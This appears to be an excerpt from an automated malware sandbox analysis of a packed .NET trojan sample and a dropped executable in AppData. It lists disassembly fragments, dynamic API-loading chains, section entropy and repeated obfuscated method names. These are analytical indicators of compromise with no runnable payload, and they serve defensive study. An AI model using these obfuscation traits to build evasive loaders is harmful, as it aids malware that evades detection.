                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 0_2_044FAC55 push FFFFFF8Bh; iretd 0_2_044FAC57
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 9_2_10002806 push ecx; ret 9_2_10002819
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00457186 push ecx; ret 15_2_00457199
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0045E55D push esi; ret 15_2_0045E566
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00457AA8 push eax; ret 15_2_00457AC6
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00434EB6 push ecx; ret 15_2_00434EC9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044693D push ecx; ret 17_2_0044694D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00451D54 push eax; ret 17_2_00451D61
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00414060 push eax; ret 20_2_00414074
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00414060 push eax; ret 20_2_0041409C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00414039 push ecx; ret 20_2_00414049
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: section name: .text entropy: 7.743373705728743
                    Source: mXJeXQoaGktJCW.exe.0.dr | Static PE information: section name: .text entropy: 7.743373705728743
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, uwB1hsrNlOFW0DGWr7.cs | High entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, kYFp04GVFWfjctExZu.cs | High entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, awBYIillJCrx859gbfK.cs | High entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, OUJVU18LcdRqehKk9N.cs | High entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, XtEEgg9xesWJtxv6yV.cs | High entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QBTSLvlpZKgHT3rkupM.cs | High entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, uqSYAbh6QxVZvqyqsQ.cs | High entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, AtSJYkzd1YVml9kH6m.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, DZhuR1lEXb724OFE0jy.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, yYA4bnqoCZikPYmxm6.cs | High entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, UeQWNuckJlDLwjm9Mk.cs | High entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | High entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, yyrLeV732OmOLQWpNj.cs | High entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, hOeFcZoKQuGvhRZZQ2.cs | High entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, jEORRnfif3v3h627MY.cs | High entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, c3ElsUsg35p7GQ8AoN.cs | High entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QhBFofCVxaxcONJT4Z.cs | High entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, PbFXXttaZcfdoJYktQ.cs | High entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, BLh0makLbVCyodwVhw.cs | High entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, vZx1jpD6tHD72wa9Ou.cs | High entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, uwB1hsrNlOFW0DGWr7.cs | High entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, kYFp04GVFWfjctExZu.cs | High entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, awBYIillJCrx859gbfK.cs | High entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, OUJVU18LcdRqehKk9N.cs | High entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, XtEEgg9xesWJtxv6yV.cs | High entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QBTSLvlpZKgHT3rkupM.cs | High entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, uqSYAbh6QxVZvqyqsQ.cs | High entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, AtSJYkzd1YVml9kH6m.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, DZhuR1lEXb724OFE0jy.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, yYA4bnqoCZikPYmxm6.cs | High entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, UeQWNuckJlDLwjm9Mk.cs | High entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs | High entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, yyrLeV732OmOLQWpNj.cs | High entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, hOeFcZoKQuGvhRZZQ2.cs | High entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, jEORRnfif3v3h627MY.cs | High entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, c3ElsUsg35p7GQ8AoN.cs | High entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QhBFofCVxaxcONJT4Z.cs | High entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, PbFXXttaZcfdoJYktQ.cs | High entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, BLh0makLbVCyodwVhw.cs | High entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, vZx1jpD6tHD72wa9Ou.cs | High entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, uwB1hsrNlOFW0DGWr7.cs | High entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, kYFp04GVFWfjctExZu.cs | High entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
